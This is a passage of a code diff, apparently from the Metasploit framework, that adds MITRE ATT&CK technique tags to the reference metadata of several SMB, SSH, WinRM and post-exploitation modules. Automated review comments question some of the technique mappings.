+ ['ATT&CK', Mitre::Attack::Technique::T1021_001_REMOTE_DESKTOP_PROTOCOL]
 ],
 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb
index 883269a3d571a..766ad263ebd71 100644
--- a/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb
+++ b/modules/exploits/windows/smb/cve_2020_0796_smbghost.rb
@@ -44,7 +44,8 @@ def initialize(info = {})
 [ 'URL', 'https://www.youtube.com/watch?v=RSV3f6aEJFY&t=1865s' ],
 [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems' ],
 [ 'URL', 'https://www.coresecurity.com/core-labs/articles/getting-physical-extreme-abuse-of-intel-based-paging-systems-part-2-windows' ],
- [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ]
+ [ 'URL', 'https://labs.bluefrostsecurity.de/blog/2017/05/11/windows-10-hals-heap-extinction-of-the-halpinterruptcontroller-table-exploitation-technique/' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ]
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'thread',
diff --git a/modules/exploits/windows/smb/ipass_pipe_exec.rb b/modules/exploits/windows/smb/ipass_pipe_exec.rb
index 145b32662bc15..59bd0c806e368 100644
--- a/modules/exploits/windows/smb/ipass_pipe_exec.rb
+++ b/modules/exploits/windows/smb/ipass_pipe_exec.rb
@@ -30,6 +30,7 @@ def initialize(info = {})
 [ 'OSVDB', '117423' ],
 [ 'BID', '72265' ],
 [ 'URL', 'http://codewhitesec.blogspot.de/2015/02/how-i-could-ipass-your-client-security.html' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES ],
 ],
 'DefaultOptions' => {
 'EXITFUNC' => 'process',
diff --git a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
index a0d905fdb6db1..3526bea7bc595 100644
--- a/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
+++ b/modules/exploits/windows/smb/smb_doublepulsar_rce.rb
@@ -47,7 +47,8 @@ def initialize(info = {})
 ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],
 ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],
 ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],
- ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']
+ ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES]
 ],
 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak
 'License' => MSF_LICENSE,
diff --git a/modules/exploits/windows/smb/smb_relay.rb b/modules/exploits/windows/smb/smb_relay.rb
index cbb333fb02848..c2dc6940134dd 100644
--- a/modules/exploits/windows/smb/smb_relay.rb
+++ b/modules/exploits/windows/smb/smb_relay.rb
@@ -83,7 +83,8 @@ module is not able to clean up after itself. The service and payload
 ['MSB', 'MS08-068'],
 ['URL', 'http://blogs.technet.com/swi/archive/2008/11/11/smb-credential-reflection.aspx'],
 ['URL', 'https://en.wikipedia.org/wiki/SMBRelay'],
- ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx']
+ ['URL', 'http://technet.microsoft.com/en-us/sysinternals/bb897553.aspx'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
 ],
 'Arch' => [ARCH_X86, ARCH_X64],
 'Platform' => 'win',
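Review bot: In the smb_relay.rb hunk, `T1021_002_SMB_WINDOWS_ADMIN_SHARES` describes authenticating to admin shares with credentials the operator already holds, whereas this module's MS08-068, smb-credential-reflection and SMBRelay references describe relaying an inbound NTLM authentication to the target; ATT&CK models that as T1557.001 (Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay). Consider adding that sub-technique if `Mitre::Attack::Technique` has a constant for it, and keep T1021.002 for the service-creation step the module description (visible in the hunk header) alludes to. The same question applies to smb_doublepulsar_rce.rb and rdp_doublepulsar_rce.rb in this and the previous line, which talk to an existing implant rather than log in with an account. The `initialize` body each array sits in starts and ends outside the hunk.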
diff --git a/modules/exploits/windows/smb/smb_shadow.rb b/modules/exploits/windows/smb/smb_shadow.rb
index 27f776a44c698..c554def21d1bf 100644
--- a/modules/exploits/windows/smb/smb_shadow.rb
+++ b/modules/exploits/windows/smb/smb_shadow.rb
@@ -38,7 +38,8 @@ def initialize(info = {})
 'Privileged' => true,
 'Payload' => {},
 'References' => [
- ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack']
+ ['URL', 'https://strontium.io/blog/introducing-windows-10-smb-shadow-attack'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_002_SMB_WINDOWS_ADMIN_SHARES]
 ],
 'Arch' => [ARCH_X86, ARCH_X64],
 'Platform' => 'win',
diff --git a/modules/exploits/windows/ssh/freesshd_authbypass.rb b/modules/exploits/windows/ssh/freesshd_authbypass.rb
index 2842e36820df5..5e0ac8626a01a 100644
--- a/modules/exploits/windows/ssh/freesshd_authbypass.rb
+++ b/modules/exploits/windows/ssh/freesshd_authbypass.rb
@@ -32,7 +32,8 @@ def initialize(info = {})
 ['OSVDB', '88006'],
 ['BID', '56785'],
 ['URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2012-12/0012.html'],
- ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132']
+ ['URL', 'https://seclists.org/fulldisclosure/2010/Aug/132'],
+ ['ATT&CK', Mitre::Attack::Technique::T1021_004_SSH]
 ],
 'Platform' => 'win',
 'Privileged' => true,
diff --git a/modules/exploits/windows/winrm/winrm_script_exec.rb b/modules/exploits/windows/winrm/winrm_script_exec.rb
index 6833d456d71ec..8df54ecc7d93c 100644
--- a/modules/exploits/windows/winrm/winrm_script_exec.rb
+++ b/modules/exploits/windows/winrm/winrm_script_exec.rb
@@ -28,6 +28,7 @@ def initialize(info = {})
 'License' => MSF_LICENSE,
 'References' => [
 [ 'URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/aa384426(v=vs.85).aspx' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_006_WINDOWS_REMOTE_MANAGEMENT ],
 ],
 'Privileged' => true,
 'DefaultOptions' => {
diff --git a/modules/post/linux/manage/sshkey_persistence.rb b/modules/post/linux/manage/sshkey_persistence.rb
index d87ebacfc778a..ea12d45c9ad9f 100644
--- a/modules/post/linux/manage/sshkey_persistence.rb
+++ b/modules/post/linux/manage/sshkey_persistence.rb
@@ -37,7 +37,10 @@ def initialize(info = {})
 stdapi_fs_separator
 ]
 }
- }
+ },
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
+ ]
 )
 )
 
diff --git a/modules/post/windows/manage/forward_pageant.rb b/modules/post/windows/manage/forward_pageant.rb
index e794bd7fa6867..a2f3e6cc20553 100644
--- a/modules/post/windows/manage/forward_pageant.rb
+++ b/modules/post/windows/manage/forward_pageant.rb
@@ -43,7 +43,10 @@ def initialize(info = {})
 extapi_pageant_send_query
 ]
 }
- }
+ },
+ 'References' => [
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]
+ ]
 )
 )
 register_options([
diff --git a/modules/post/windows/manage/pptp_tunnel.rb b/modules/post/windows/manage/pptp_tunnel.rb
index d7b81464d9621..a4d96e358b90f 100644
--- a/modules/post/windows/manage/pptp_tunnel.rb
+++ b/modules/post/windows/manage/pptp_tunnel.rb
@@ -22,7 +22,8 @@ def initialize(info = {})
 'License' => MSF_LICENSE,
 'Author' => 'Borja Merino ',
 'References' => [
- [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ]
+ [ 'URL', 'https://www.youtube.com/watch?v=vdppEZjMPCM&hd=1' ],
+ [ 'ATT&CK', Mitre::Attack::Technique::T1021_REMOTE_SERVICES ]
 ],
 'Platform' => 'win',
 'SessionTypes' => [ 'meterpreter' ],
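Review bot: The sshkey_persistence.rb hunk tags a post module that, going by its name, plants an SSH key for persistence with `T1021_REMOTE_SERVICES`, a lateral-movement technique; ATT&CK's persistence sub-technique for this is T1098.004 (Account Manipulation: SSH Authorized Keys), and any later use of that key would be the SSH-specific `T1021_004_SSH` rather than the parent. Consider a T1098.004 constant if `Mitre::Attack::Technique` provides one, and `[ 'ATT&CK', Mitre::Attack::Technique::T1021_004_SSH ]` where a T1021 tag is kept, so the module is searchable under the same sub-technique as the SSH exploits in this change. I am inferring the module's behaviour from its path, so please confirm against the body, which lies outside the hunk along with the rest of `initialize`.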